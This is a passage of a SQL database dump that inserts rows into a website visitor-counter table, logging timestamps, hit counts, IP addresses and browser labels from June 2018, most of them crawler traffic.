(262529,1530043503,1,1,0,0,'54.36.149.14','other'),(262530,1530043531,1,1,0,0,'188.32.126.131','msie'),(262531,1530043832,1,1,0,0,'54.36.148.93','other'),(262532,1530044068,1,1,0,0,'216.244.66.241','other'),(262533,1530044251,1,1,0,0,'95.163.255.94','other'),(262534,1530044266,2,2,0,0,'178.154.171.88','other'),(262535,1530044594,1,1,0,0,'188.163.89.1','chrome'),(262536,1530044704,1,1,0,0,'54.36.148.199','other'),(262537,1530044981,3,3,0,0,'141.8.142.74','other'),(262538,1530045159,1,0,1,0,'66.249.70.27',''),(262539,1530045517,1,1,0,0,'54.36.148.204','other'),(262540,1530045741,1,1,0,0,'54.36.149.4','other'),(262541,1530045841,1,1,0,0,'54.36.149.20','other'),(262542,1530045969,1,1,0,0,'66.249.64.30','chrome'),(262543,1530046020,1,1,0,0,'66.249.70.27','chrome'),(262544,1530046227,1,1,0,0,'54.36.148.43','other'),(262545,1530046373,1,1,0,0,'216.244.66.241','other'),(262546,1530046544,1,1,0,0,'180.76.15.23','other'),(262547,1530047114,1,1,0,0,'54.36.148.219','other'),(262548,1530047603,1,1,0,0,'8.29.198.27','other'),(262549,1530047609,1,1,0,0,'207.46.13.139','other'),(262550,1530047736,1,1,0,0,'54.36.148.167','other'),(262551,1530047745,1,1,0,0,'54.36.148.249','other'),(262552,1530048128,1,0,1,0,'66.249.64.29',''),(262553,1530048301,1,1,0,0,'54.36.148.84','other'),(262554,1530048395,1,1,0,0,'54.36.148.156','other'),(262555,1530048623,1,1,0,0,'54.36.148.62','other'),(262556,1530048959,1,1,0,0,'54.36.148.34','other'),(262557,1530048970,1,1,0,0,'188.163.89.1','chrome'),(262558,1530048985,1,0,1,0,'66.249.70.27',''),(262559,1530049057,1,0,1,0,'66.249.70.25',''),(262560,1530049074,1,1,0,0,'144.76.29.162','other'),(262561,1530049161,1,1,0,0,'54.36.149.62','other'),(262562,1530049176,1,1,0,0,'54.36.148.114','other'),(262563,1530049432,2,2,0,0,'54.36.148.141','other'),(262564,1530049467,1,1,0,0,'54.36.148.88','other'),(262565,1530049543,1,1,0,0,'178.154.171.88','other'),(262566,1530049699,1,1,0,0,'54.36.149.93','other'),(262567,1530049891,2,2,0,0,'216.244.66.241','other'),(262568,1530050045,1,1,0,0,'54.36.148.82','other'),(262569,1530050079,1,1,0,0,'54.36.148.65','other'),(262570,1530050137,1,1,0,0,'91.196.178.92','chrome'),(262571,1530050178,1,1,0,0,'207.46.13.137','other'),(262572,1530050189,1,1,0,0,'54.36.148.197','other'),(262573,1530050202,1,0,1,0,'66.249.64.28',''),(262574,1530050868,1,1,0,0,'54.36.149.11','other'),(262575,1530050877,1,1,0,0,'54.36.148.86','other'),(262576,1530051171,1,1,0,0,'178.154.171.88','other'),(262577,1530051250,1,1,0,0,'54.36.148.44','other'),(262578,1530052128,1,1,0,0,'54.36.149.35','other'),(262579,1530052395,1,1,0,0,'54.36.148.74','other'),(262580,1530052502,1,1,0,0,'54.36.149.69','other'),(262581,1530052581,1,1,0,0,'54.36.149.56','other'),(262582,1530052652,1,1,0,0,'54.36.149.19','other'),(262583,1530053281,2,1,1,0,'66.249.64.29',''),(262584,1530053349,1,1,0,0,'54.36.148.29','other'),(262585,1530053351,1,1,0,0,'54.36.148.131','other'),(262586,1530053535,1,1,0,0,'8.29.198.27','other'),(262587,1530053684,1,1,0,0,'54.36.148.194','other'),(262588,1530054129,1,1,0,0,'54.36.149.40','other'),(262589,1530054233,2,0,2,0,'66.249.64.29',''),(262590,1530054426,1,1,0,0,'54.36.148.219','other'),(262591,1530054779,1,1,0,0,'54.36.149.107','other'),(262592,1530054910,1,1,0,0,'54.36.149.65','other'),(262593,1530055069,1,1,0,0,'141.8.142.74','other'),(262594,1530055116,1,1,0,0,'54.36.149.67','other'),(262595,1530055284,1,1,0,0,'54.36.149.13','other'),(262596,1530055660,3,3,0,0,'216.244.66.241','other'),(262597,1530055730,1,1,0,0,'54.36.149.102','other'),(262598,1530056335,1,1,0,0,'54.36.148.87','other'),(262599,1530056449,1,1,0,0,'54.36.149.14','other'),(262600,1530056570,1,1,0,0,'54.36.148.170','other'),(262601,1530056614,1,1,0,0,'54.36.149.27','other'),(262602,1530056722,1,1,0,0,'54.36.148.240','other'),(262603,1530056754,1,1,0,0,'54.36.149.16','other'),(262604,1530056936,1,1,0,0,'141.8.142.74','other'),(262605,1530057015,1,1,0,0,'54.36.149.47','other'),(262606,1530057041,1,1,0,0,'216.244.66.241','other'),(262607,1530057379,1,1,0,0,'54.36.149.59','other'),(262608,1530057424,1,1,0,0,'54.36.148.69','other'),(262609,1530057516,1,1,0,0,'54.36.148.117','other'),(262610,1530057614,1,1,0,0,'141.8.132.19','other'),(262611,1530057868,1,1,0,0,'54.36.148.58','other'),(262612,1530057967,2,2,0,0,'178.154.171.88','other'),(262613,1530057968,1,1,0,0,'54.36.148.103','other'),(262614,1530058120,1,1,0,0,'54.36.149.30','other'),(262615,1530058121,1,1,0,0,'54.36.148.187','other'),(262616,1530058125,1,1,0,0,'54.36.148.137','other'),(262617,1530058263,1,1,0,0,'54.36.148.91','other'),(262618,1530058353,1,1,0,0,'216.244.66.241','other'),(262619,1530058425,1,1,0,0,'8.29.198.25','other'),(262620,1530058726,1,1,0,0,'54.36.148.45','other'),(262621,1530058866,1,1,0,0,'180.76.15.157','other'),(262622,1530059316,1,1,0,0,'54.36.148.165','other'),(262623,1530059392,1,1,0,0,'54.36.148.181','other'),(262624,1530059658,1,1,0,0,'54.36.149.85','other'),(262625,1530059861,1,1,0,0,'54.36.148.205','other'),(262626,1530059910,1,1,0,0,'54.36.148.10','other'),(262627,1530060094,1,1,0,0,'54.36.149.26','other'),(262628,1530060158,2,2,0,0,'178.154.171.88','other'),(262629,1530060260,1,1,0,0,'54.36.148.249','other'),(262630,1530060274,1,1,0,0,'54.36.148.98','other'),(262631,1530060444,1,1,0,0,'54.36.148.56','other'),(262632,1530060777,1,1,0,0,'54.36.148.164','other'),(262633,1530061083,1,1,0,0,'54.36.149.57','other'),(262634,1530061103,1,1,0,0,'54.36.148.34','other'),(262635,1530061116,1,1,0,0,'54.36.149.30','other'),(262636,1530061341,1,1,0,0,'54.36.149.72','other'),(262637,1530061384,1,0,1,0,'66.249.64.28',''),(262638,1530061629,1,0,1,0,'66.249.64.30',''),(262639,1530061708,1,1,0,0,'54.36.149.77','other'),(262640,1530061914,1,1,0,0,'54.36.148.72','other'),(262641,1530062411,1,1,0,0,'54.36.148.156','other'),(262642,1530062585,1,1,0,0,'54.36.149.21','other'),(262643,1530062715,1,1,0,0,'54.36.148.57','other'),(262644,1530062922,1,1,0,0,'54.36.149.87','other'),(262645,1530062998,1,1,0,0,'66.249.70.29','chrome'),(262646,1530063042,1,1,0,0,'54.36.148.10','other'),(262647,1530063764,1,0,1,0,'66.249.64.29',''),(262648,1530064218,1,1,0,0,'54.36.148.55','other'),(262649,1530064250,2,2,0,0,'54.36.149.32','other'),(262650,1530064374,1,1,0,0,'8.29.198.26','other'),(262651,1530064635,1,1,0,0,'54.36.148.105','other'),(262652,1530064729,1,1,0,0,'54.36.148.182','other'),(262653,1530064742,1,1,0,0,'54.36.148.146','other'),(262654,1530064883,1,1,0,0,'54.36.148.24','other'),(262655,1530064901,2,2,0,0,'54.36.148.130','other'),(262656,1530064902,1,1,0,0,'54.36.148.206','other'),(262657,1530064956,1,1,0,0,'66.249.70.25','chrome'),(262658,1530065167,1,1,0,0,'54.36.148.53','other'),(262659,1530065637,1,1,0,0,'54.36.148.217','other'),(262660,1530065642,1,1,0,0,'180.76.15.142','other'),(262661,1530065739,1,1,0,0,'54.36.149.104','other'),(262662,1530066156,2,0,2,0,'66.249.70.27',''),(262663,1530066295,1,1,0,0,'54.36.148.81','other'),(262664,1530066322,1,1,0,0,'91.209.11.236','other'),(262665,1530067466,1,1,0,0,'37.9.113.182','other'),(262666,1530067785,1,1,0,0,'216.244.66.241','other'),(262667,1530069254,1,1,0,0,'8.29.198.25','other'),(262668,1530070238,1,1,0,0,'54.36.149.100','other'),(262669,1530070357,1,1,0,0,'54.36.149.104','other'),(262670,1530070491,1,1,0,0,'54.36.148.25','other'),(262671,1530070530,1,1,0,0,'54.36.148.27','other'),(262672,1530070597,2,2,0,0,'216.244.66.241','other'),(262673,1530070855,1,1,0,0,'54.36.148.115','other'),(262674,1530071124,1,1,0,0,'54.36.148.76','other'),(262675,1530071629,1,0,1,0,'66.249.70.29',''),(262676,1530071678,1,1,0,0,'216.244.66.241','other'),(262677,1530071843,1,1,0,0,'54.36.149.41','other'),(262678,1530072029,1,1,0,0,'178.154.171.88','other'),(262679,1530072084,1,1,0,0,'141.8.142.74','other'),(262680,1530072156,1,1,0,0,'54.36.148.43','other'),(262681,1530072164,1,1,0,0,'54.36.148.82','other'),(262682,1530072254,1,1,0,0,'54.36.148.13','other'),(262683,1530072260,1,1,0,0,'54.36.148.92','other'),(262684,1530072436,1,1,0,0,'54.36.148.130','other'),(262685,1530072696,1,1,0,0,'54.36.148.73','other'),(262686,1530072822,1,0,1,0,'66.249.64.29',''),(262687,1530072990,1,1,0,0,'66.249.64.30','chrome'),(262688,1530073115,1,1,0,0,'54.36.149.64','other'),(262689,1530073244,1,1,0,0,'54.36.149.47','other'),(262690,1530073540,1,1,0,0,'54.36.149.78','other'),(262691,1530073577,2,2,0,0,'54.36.148.53','other'),(262692,1530073750,2,2,0,0,'95.213.141.126','opera'),(262693,1530073756,1,1,0,0,'54.36.148.212','other'),(262694,1530073759,1,1,0,0,'54.36.149.99','other'),(262695,1530073853,1,1,0,0,'54.36.148.48','other'),(262696,1530074192,1,1,0,0,'141.8.142.74','other'),(262697,1530074240,1,1,0,0,'54.36.148.104','other'),(262698,1530074284,1,1,0,0,'54.36.149.29','other'),(262699,1530074389,1,0,1,0,'66.249.64.29',''),(262700,1530074485,3,3,0,0,'95.163.255.106','other'),(262701,1530074496,4,4,0,0,'95.163.255.102','other'),(262702,1530074512,2,2,0,0,'95.163.255.104','other'),(262703,1530074523,2,2,0,0,'95.163.255.107','other'),(262704,1530074534,3,3,0,0,'95.163.255.119','other'),(262705,1530074545,1,1,0,0,'95.163.255.105','other'),(262706,1530074557,2,2,0,0,'95.163.255.114','other'),(262707,1530074592,3,3,0,0,'95.163.255.116','other'),(262708,1530074628,1,1,0,0,'95.163.255.112','other'),(262709,1530074639,1,1,0,0,'95.163.255.117','other'),(262710,1530074705,1,1,0,0,'54.36.149.7','other'),(262711,1530074708,1,1,0,0,'95.163.255.103','other'),(262712,1530074758,2,2,0,0,'95.163.255.118','other'),(262713,1530074936,1,1,0,0,'66.249.70.25','chrome'),(262714,1530074948,1,1,0,0,'54.36.149.98','other'),(262715,1530075193,1,1,0,0,'54.36.148.221','other'),(262716,1530075217,1,1,0,0,'8.29.198.26','other'),(262717,1530075254,1,1,0,0,'54.36.148.194','other'),(262718,1530075388,1,1,0,0,'54.36.149.67','other'),(262719,1530075434,1,1,0,0,'54.36.148.175','other'),(262720,1530075716,1,0,1,0,'66.249.70.27',''),(262721,1530075777,1,1,0,0,'54.36.149.37','other'),(262722,1530075824,1,0,1,0,'66.249.64.28',''),(262723,1530075919,1,1,0,0,'54.36.148.195','other'),(262724,1530076135,2,2,0,0,'91.196.178.93','chrome'),(262725,1530076289,1,1,0,0,'54.36.149.89','other'),(262726,1530076447,1,1,0,0,'216.244.66.241','other'),(262727,1530076592,1,1,0,0,'54.36.149.43','other'),(262728,1530076731,1,1,0,0,'54.36.149.19','other'),(262729,1530076836,1,1,0,0,'54.36.149.59','other'),(262730,1530077351,1,1,0,0,'87.250.224.46','other'),(262731,1530077486,1,1,0,0,'54.36.149.66','other'),(262732,1530077578,1,1,0,0,'54.36.148.29','other'),(262733,1530077700,1,1,0,0,'54.36.148.49','other'),(262734,1530077883,1,1,0,0,'54.36.148.115','other'),(262735,1530077910,1,1,0,0,'54.36.148.205','other'),(262736,1530078026,1,1,0,0,'54.36.148.164','other'),(262737,1530078055,7,7,0,0,'91.196.178.78','chrome'),(262738,1530078226,1,1,0,0,'54.36.149.34','other'),(262739,1530078274,1,1,0,0,'95.163.255.99','other'),(262740,1530078283,1,0,1,0,'66.249.64.28',''),(262741,1530078295,1,0,1,0,'66.249.64.29',''),(262742,1530078316,2,2,0,0,'91.196.178.65','chrome'),(262743,1530078491,1,1,0,0,'145.255.1.229','chrome'),(262744,1530078547,2,0,2,0,'66.249.64.30',''),(262745,1530078631,1,1,0,0,'54.36.148.237','other'),(262746,1530078672,1,1,0,0,'54.36.149.14','other'),(262747,1530078676,1,1,0,0,'216.244.66.241','other'),(262748,1530078741,2,2,0,0,'91.196.178.169','chrome'),(262749,1530078922,1,1,0,0,'54.36.148.118','other'),(262750,1530078945,1,1,0,0,'54.36.148.45','other'),(262751,1530078972,1,1,0,0,'66.249.70.27','chrome'),(262752,1530078991,2,2,0,0,'91.196.178.78','chrome'),(262753,1530079082,1,1,0,0,'195.230.119.59','chrome'),(262754,1530079146,1,1,0,0,'141.8.142.74','other'),(262755,1530079155,1,1,0,0,'46.200.217.4','chrome'),(262756,1530079459,1,1,0,0,'54.36.148.182','other'),(262757,1530079494,1,1,0,0,'54.36.149.97','other'),(262758,1530079787,1,1,0,0,'54.36.148.143','other'),(262759,1530079803,1,1,0,0,'54.36.148.50','other'),(262760,1530079812,3,3,0,0,'216.244.66.241','other'),(262761,1530079848,1,1,0,0,'54.36.148.85','other'),(262762,1530079876,1,1,0,0,'54.36.148.163','other'),(262763,1530080079,1,1,0,0,'8.29.198.26','other'),(262764,1530080436,1,1,0,0,'54.36.148.111','other'),(262765,1530080439,1,1,0,0,'141.8.142.74','other'),(262766,1530080468,1,1,0,0,'54.36.148.30','other'),(262767,1530080475,1,1,0,0,'54.36.148.70','other'),(262768,1530080588,1,1,0,0,'178.154.171.88','other'),(262769,1530080656,1,1,0,0,'54.36.148.46','other'),(262770,1530080660,1,1,0,0,'54.36.148.38','other'),(262771,1530080990,1,1,0,0,'54.36.148.13','other'),(262772,1530081092,1,1,0,0,'54.36.148.81','other'),(262773,1530081504,1,1,0,0,'54.36.148.138','other'),(262774,1530081600,1,1,0,0,'54.36.149.14','other'),(262775,1530081702,1,1,0,0,'54.36.148.146','other'),(262776,1530082268,1,1,0,0,'54.36.148.179','other'),(262777,1530082304,1,1,0,0,'54.36.148.116','other'),(262778,1530082435,1,1,0,0,'54.36.149.10','other'),(262779,1530082443,1,1,0,0,'54.36.149.92','other'),(262780,1530082545,1,1,0,0,'54.36.149.22','other'),(262781,1530082846,1,1,0,0,'141.8.142.74','other'),(262782,1530082856,1,1,0,0,'54.36.149.76','other'),(262783,1530082910,1,0,1,0,'66.249.70.25',''),(262784,1530083398,1,0,1,0,'66.249.70.29',''),(262785,1530083550,1,1,0,0,'91.196.178.131','firefox'),(262786,1530083664,1,1,0,0,'37.9.113.132','other'),(262787,1530083989,1,1,0,0,'54.36.149.69','other'),(262788,1530084149,1,1,0,0,'54.36.149.23','other'),(262789,1530084171,1,0,1,0,'66.249.64.28',''),(262790,1530084259,2,2,0,0,'141.8.142.74','other'),(262791,1530084483,1,1,0,0,'66.249.64.29','chrome'),(262792,1530084592,1,1,0,0,'54.36.148.253','other'),(262793,1530084601,2,2,0,0,'216.244.66.241','other'),(262794,1530084892,1,1,0,0,'66.249.70.29','chrome'),(262795,1530084925,1,1,0,0,'54.36.148.155','other'),(262796,1530085070,1,1,0,0,'54.36.149.27','other'),(262797,1530085086,1,1,0,0,'213.180.203.8','other'),(262798,1530085657,1,1,0,0,'54.36.148.96','other'),(262799,1530085980,1,1,0,0,'54.36.149.91','other'),(262800,1530086066,1,0,1,0,'66.249.64.28',''),(262801,1530086069,1,1,0,0,'8.29.198.27','other'),(262802,1530086176,1,1,0,0,'199.58.86.211','other'),(262803,1530086177,2,0,2,0,'66.249.64.29',''),(262804,1530086184,2,2,0,0,'141.8.142.74','other'),(262805,1530086339,1,0,1,0,'66.249.70.25',''),(262806,1530086437,1,1,0,0,'66.249.64.28','chrome'),(262807,1530086537,1,1,0,0,'54.36.149.34','other'),(262808,1530086606,2,2,0,0,'130.180.217.41','chrome'),(262809,1530086735,2,0,2,0,'66.249.70.27',''),(262810,1530086802,1,1,0,0,'54.36.148.133','other'),(262811,1530086868,1,1,0,0,'54.36.148.137','other'),(262812,1530086938,1,1,0,0,'54.36.148.170','other'),(262813,1530087067,1,1,0,0,'78.111.190.93','chrome'),(262814,1530087234,1,1,0,0,'54.36.148.22','other'),(262815,1530087413,1,1,0,0,'54.36.148.122','other'),(262816,1530087589,1,1,0,0,'54.36.148.212','other'),(262817,1530087591,1,1,0,0,'216.244.66.241','other'),(262818,1530087742,1,1,0,0,'54.36.148.90','other'),(262819,1530087833,1,1,0,0,'54.36.148.115','other'),(262820,1530087878,1,1,0,0,'54.36.148.229','other'),(262821,1530087894,1,1,0,0,'91.124.182.170','firefox'),(262822,1530087902,2,2,0,0,'91.196.178.78','chrome'),(262823,1530088046,1,1,0,0,'54.36.148.156','other'),(262824,1530088374,1,1,0,0,'178.154.171.88','other'),(262825,1530088415,1,1,0,0,'54.36.149.7','other'),(262826,1530088515,1,1,0,0,'54.36.148.164','other'),(262827,1530088525,1,1,0,0,'54.36.148.55','other'),(262828,1530088764,1,1,0,0,'188.163.0.139','chrome'),(262829,1530088822,1,1,0,0,'66.249.70.27','chrome'),(262830,1530088844,1,1,0,0,'54.36.149.85','other'),(262831,1530089010,1,1,0,0,'54.36.149.16','other'),(262832,1530089227,1,1,0,0,'54.36.148.86','other'),(262833,1530089308,1,1,0,0,'54.36.148.56','other'),(262834,1530089451,1,1,0,0,'216.244.66.241','other'),(262835,1530089479,1,1,0,0,'54.165.59.7','other'),(262836,1530089574,1,1,0,0,'95.135.223.19','firefox'),(262837,1530089849,2,2,0,0,'54.36.148.236','other'),(262838,1530089857,1,1,0,0,'54.36.149.80','other'),(262839,1530090039,1,1,0,0,'87.250.224.46','other'),(262840,1530090242,1,1,0,0,'91.196.177.46','chrome'),(262841,1530090429,1,1,0,0,'216.244.66.241','other'),(262842,1530090715,1,1,0,0,'54.36.149.34','other'),(262843,1530090903,1,1,0,0,'8.29.198.27','other'),(262844,1530091089,1,1,0,0,'54.36.148.138','other'),(262845,1530091300,1,1,0,0,'54.36.148.234','other'),(262846,1530091356,1,0,1,0,'66.249.64.28',''),(262847,1530091434,1,1,0,0,'92.112.210.246','chrome'),(262848,1530091446,1,0,1,0,'66.249.70.29',''),(262849,1530091581,1,1,0,0,'91.124.182.170','firefox'),(262850,1530091594,1,1,0,0,'54.36.149.56','other'),(262851,1530091748,3,3,0,0,'91.196.178.78','chrome'),(262852,1530091839,1,1,0,0,'31.13.112.143','other'),(262853,1530091851,1,1,0,0,'31.13.113.187','other'),(262854,1530091855,2,2,0,0,'141.8.142.74','other'),(262855,1530091867,1,1,0,0,'69.171.252.12','other'),(262856,1530091888,1,1,0,0,'54.36.149.91','other'),(262857,1530092042,1,1,0,0,'54.36.148.158','other'),(262858,1530092244,1,1,0,0,'54.36.148.146','other'),(262859,1530092255,1,1,0,0,'66.249.70.29','chrome'),(262860,1530092302,1,1,0,0,'54.36.149.23','other'),(262861,1530092532,1,1,0,0,'54.36.148.246','other'),(262862,1530092560,1,1,0,0,'54.36.148.69','other'),(262863,1530092640,1,1,0,0,'91.124.182.170','firefox'),(262864,1530092662,1,1,0,0,'54.36.148.178','other'),(262865,1530092702,1,1,0,0,'46.188.42.220','chrome'),(262866,1530092761,1,1,0,0,'188.163.32.188','chrome'),(262867,1530092929,1,1,0,0,'54.165.59.7','other'),(262868,1530092952,1,1,0,0,'216.244.66.241','other'),(262869,1530092963,1,1,0,0,'46.211.26.66','other'),(262870,1530093025,1,1,0,0,'54.36.149.63','other'),(262871,1530093105,1,1,0,0,'54.36.148.15','other'),(262872,1530093295,1,1,0,0,'54.36.148.139','other'),(262873,1530093372,1,1,0,0,'91.196.179.33','chrome'),(262874,1530093474,1,1,0,0,'54.36.148.100','other'),(262875,1530093710,1,1,0,0,'54.36.149.74','other'),(262876,1530094092,1,1,0,0,'54.36.149.12','other'),(262877,1530094620,1,1,0,0,'91.196.178.171','chrome'),(262878,1530094755,1,1,0,0,'130.180.211.156','chrome'),(262879,1530094783,1,1,0,0,'92.112.210.246','chrome'),(262880,1530095027,1,1,0,0,'54.36.148.185','other'),(262881,1530095055,1,1,0,0,'54.36.149.2','other'),(262882,1530095393,1,1,0,0,'216.244.66.241','other'),(262883,1530095496,1,1,0,0,'54.36.149.87','other'),(262884,1530095580,2,2,0,0,'130.180.216.190','chrome'),(262885,1530095610,1,1,0,0,'54.36.148.99','other'),(262886,1530095796,1,1,0,0,'54.36.149.24','other'),(262887,1530096119,1,1,0,0,'66.249.64.29','chrome'),(262888,1530096231,1,1,0,0,'54.36.149.74','other'),(262889,1530096489,1,1,0,0,'54.36.149.90','other'),(262890,1530096500,1,1,0,0,'78.111.186.36','chrome'),(262891,1530096550,1,1,0,0,'54.36.148.74','other'),(262892,1530096594,1,1,0,0,'54.36.148.65','other'),(262893,1530096827,1,1,0,0,'178.154.171.88','other'),(262894,1530096936,1,1,0,0,'8.29.198.25','other'),(262895,1530097064,1,1,0,0,'54.36.148.172','other'),(262896,1530097253,1,1,0,0,'54.36.148.193','other'),(262897,1530097290,1,1,0,0,'54.36.148.221','other'),(262898,1530097371,1,1,0,0,'92.112.105.243','chrome'),(262899,1530097406,1,1,0,0,'54.36.148.80','other'),(262900,1530097735,1,1,0,0,'54.36.148.17','other'),(262901,1530097756,1,1,0,0,'54.36.149.71','other'),(262902,1530097798,1,1,0,0,'46.200.217.4','chrome'),(262903,1530097917,1,1,0,0,'66.249.70.29','chrome'),(262904,1530098072,1,1,0,0,'54.36.148.230','other'),(262905,1530098290,1,1,0,0,'54.36.148.161','other'),(262906,1530098438,1,1,0,0,'216.244.66.241','other'),(262907,1530098472,1,1,0,0,'82.207.13.25','firefox'),(262908,1530098740,1,1,0,0,'87.250.224.46','other'),(262909,1530098783,1,1,0,0,'54.36.148.202','other'),(262910,1530098801,2,2,0,0,'178.154.171.88','other'),(262911,1530098805,1,1,0,0,'37.9.113.115','other'),(262912,1530098833,1,1,0,0,'54.36.148.246','other'),(262913,1530099022,1,1,0,0,'54.36.148.75','other'),(262914,1530099303,1,1,0,0,'54.36.148.243','other'),(262915,1530099576,1,1,0,0,'54.36.148.57','other'),(262916,1530099610,1,1,0,0,'54.36.148.68','other'),(262917,1530099614,1,1,0,0,'91.196.178.99','chrome'),(262918,1530099633,1,1,0,0,'130.180.208.148','chrome'),(262919,1530099720,1,1,0,0,'54.36.148.36','other'),(262920,1530099969,1,1,0,0,'54.36.149.65','other'),(262921,1530100024,1,1,0,0,'91.196.178.84','firefox'),(262922,1530100048,1,1,0,0,'54.36.148.195','other'),(262923,1530100212,1,1,0,0,'54.36.148.142','other'),(262924,1530100241,2,2,0,0,'91.196.178.98','chrome'),(262925,1530100270,1,1,0,0,'178.154.171.88','other'),(262926,1530100297,1,1,0,0,'54.36.149.63','other'),(262927,1530100322,1,1,0,0,'54.36.148.124','other'),(262928,1530100445,1,1,0,0,'54.36.148.155','other'),(262929,1530100651,1,0,1,0,'66.249.64.30',''),(262930,1530100707,1,1,0,0,'54.36.148.93','other'),(262931,1530100734,1,1,0,0,'54.36.148.234','other'),(262932,1530100868,1,1,0,0,'141.8.142.74','other'),(262933,1530100980,1,1,0,0,'54.36.149.23','other'),(262934,1530101242,2,2,0,0,'54.165.59.7','other'),(262935,1530101314,1,1,0,0,'54.36.148.80','other'),(262936,1530101713,1,1,0,0,'54.36.149.41','other'),(262937,1530101724,1,1,0,0,'8.29.198.25','other'),(262938,1530101776,1,1,0,0,'54.36.148.104','other'),(262939,1530101858,1,1,0,0,'91.196.177.15','chrome'),(262940,1530102053,1,1,0,0,'54.36.148.62','other'),(262941,1530102279,1,1,0,0,'54.36.148.52','other'),(262942,1530102422,1,1,0,0,'54.36.148.113','other'),(262943,1530102486,1,1,0,0,'54.36.149.83','other'),(262944,1530102552,1,1,0,0,'136.243.74.70','other'),(262945,1530102842,1,1,0,0,'5.228.189.169','msie'),(262946,1530102873,1,1,0,0,'54.36.148.116','other'),(262947,1530102940,2,2,0,0,'141.8.142.74','other'),(262948,1530102950,1,1,0,0,'173.252.90.238','other'),(262949,1530103219,1,1,0,0,'91.196.178.164','chrome'),(262950,1530103239,1,1,0,0,'82.207.47.76','chrome'),(262951,1530103349,1,1,0,0,'66.249.64.28','chrome'),(262952,1530103358,1,1,0,0,'54.36.148.107','other'),(262953,1530103589,1,1,0,0,'54.36.148.228','other'),(262954,1530103770,1,1,0,0,'54.36.148.110','other'),(262955,1530103885,1,1,0,0,'54.36.148.68','other'),(262956,1530104021,1,1,0,0,'54.36.149.107','other'),(262957,1530104143,2,2,0,0,'91.196.178.93','chrome'),(262958,1530104196,1,1,0,0,'54.36.148.64','other'),(262959,1530104312,1,1,0,0,'141.8.142.74','other'),(262960,1530104455,1,1,0,0,'54.36.148.161','other'),(262961,1530104573,1,1,0,0,'54.36.148.173','other'),(262962,1530104587,1,1,0,0,'54.36.149.53','other'),(262963,1530104691,1,1,0,0,'178.154.171.88','other'),(262964,1530104693,1,1,0,0,'87.250.224.46','other'),(262965,1530104809,1,1,0,0,'54.36.148.122','other'),(262966,1530104914,1,1,0,0,'54.36.148.87','other'),(262967,1530104981,1,1,0,0,'54.36.148.198','other'),(262968,1530105125,1,1,0,0,'54.36.148.224','other'),(262969,1530105489,1,1,0,0,'54.36.148.46','other'),(262970,1530105491,1,0,1,0,'66.249.64.29',''),(262971,1530105658,1,1,0,0,'178.154.171.88','other'),(262972,1530105716,1,1,0,0,'54.36.148.134','other'),(262973,1530105788,1,1,0,0,'91.196.178.93','firefox'),(262974,1530105942,2,2,0,0,'130.180.217.21','chrome'),(262975,1530106339,1,1,0,0,'54.36.148.76','other'),(262976,1530106378,3,3,0,0,'216.244.66.241','other'),(262977,1530106584,1,1,0,0,'54.36.148.204','other'),(262978,1530106656,1,1,0,0,'78.46.149.254','other'),(262979,1530106815,1,1,0,0,'91.196.178.104','chrome'),(262980,1530106823,1,1,0,0,'54.36.148.254','other'),(262981,1530106856,1,1,0,0,'173.252.88.117','other'),(262982,1530106921,1,1,0,0,'54.36.149.16','other'),(262983,1530107246,1,1,0,0,'40.77.167.156','other'),(262984,1530107468,1,1,0,0,'54.36.148.83','other'),(262985,1530107647,1,1,0,0,'54.36.148.222','other'),(262986,1530107764,1,1,0,0,'54.36.149.64','other'),(262987,1530107783,1,1,0,0,'8.29.198.25','other'),(262988,1530107815,1,1,0,0,'54.36.148.194','other'),(262989,1530107874,1,1,0,0,'141.8.142.74','other'),(262990,1530108018,1,1,0,0,'54.36.148.41','other'),(262991,1530108096,1,1,0,0,'54.36.149.10','other'),(262992,1530108177,1,1,0,0,'54.36.148.59','other'),(262993,1530108461,1,1,0,0,'54.36.148.152','other'),(262994,1530108776,1,1,0,0,'54.36.148.171','other'),(262995,1530108888,1,1,0,0,'54.36.148.91','other'),(262996,1530108911,1,1,0,0,'141.8.142.74','other'),(262997,1530108979,1,1,0,0,'178.154.200.41','other'),(262998,1530109156,1,1,0,0,'54.36.149.15','other'),(262999,1530109237,2,2,0,0,'216.244.66.241','other'),(263000,1530109441,2,2,0,0,'94.179.247.52','chrome'),(263001,1530109627,1,1,0,0,'54.36.148.78','other'),(263002,1530109851,1,1,0,0,'54.36.149.44','other'),(263003,1530109912,1,1,0,0,'54.36.148.205','other'),(263004,1530110363,1,1,0,0,'54.36.148.146','other'),(263005,1530110384,1,1,0,0,'54.36.148.148','other'),(263006,1530110432,1,1,0,0,'54.36.148.216','other'),(263007,1530110536,1,1,0,0,'54.36.148.23','other'),(263008,1530110762,1,1,0,0,'54.36.149.90','other'),(263009,1530110903,1,1,0,0,'54.36.149.38','other'),(263010,1530111543,1,1,0,0,'54.36.148.133','other'),(263011,1530111599,1,1,0,0,'54.36.148.48','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (263012,1530111817,1,1,0,0,'54.36.149.107','other'),(263013,1530111997,1,1,0,0,'54.36.148.250','other'),(263014,1530112010,1,1,0,0,'54.36.148.140','other'),(263015,1530112056,1,1,0,0,'54.36.148.72','other'),(263016,1530112157,2,2,0,0,'178.154.171.88','other'),(263017,1530112167,1,1,0,0,'54.36.148.251','other'),(263018,1530112177,1,1,0,0,'54.36.148.242','other'),(263019,1530112186,1,1,0,0,'37.9.113.182','other'),(263020,1530112260,1,1,0,0,'54.36.148.113','other'),(263021,1530112431,1,1,0,0,'180.76.15.22','other'),(263022,1530112547,1,1,0,0,'8.29.198.27','other'),(263023,1530112808,1,1,0,0,'54.36.148.188','other'),(263024,1530113102,1,1,0,0,'54.36.149.82','other'),(263025,1530113212,1,1,0,0,'54.36.148.86','other'),(263026,1530113284,1,1,0,0,'95.163.255.95','other'),(263027,1530113546,1,1,0,0,'54.36.148.135','other'),(263028,1530113617,2,2,0,0,'54.36.148.55','other'),(263029,1530114189,1,1,0,0,'54.36.149.26','other'),(263030,1530114556,1,1,0,0,'178.154.200.41','other'),(263031,1530115638,1,1,0,0,'216.244.66.241','other'),(263032,1530115639,1,1,0,0,'54.36.148.249','other'),(263033,1530115754,3,3,0,0,'141.8.142.74','other'),(263034,1530115761,1,1,0,0,'178.154.171.88','other'),(263035,1530115818,1,1,0,0,'54.36.148.94','other'),(263036,1530115966,1,1,0,0,'54.36.148.24','other'),(263037,1530116046,1,1,0,0,'54.36.149.36','other'),(263038,1530116132,1,1,0,0,'54.36.148.67','other'),(263039,1530116176,1,1,0,0,'54.36.148.70','other'),(263040,1530116377,1,1,0,0,'87.250.224.46','other'),(263041,1530116475,1,1,0,0,'54.36.149.93','other'),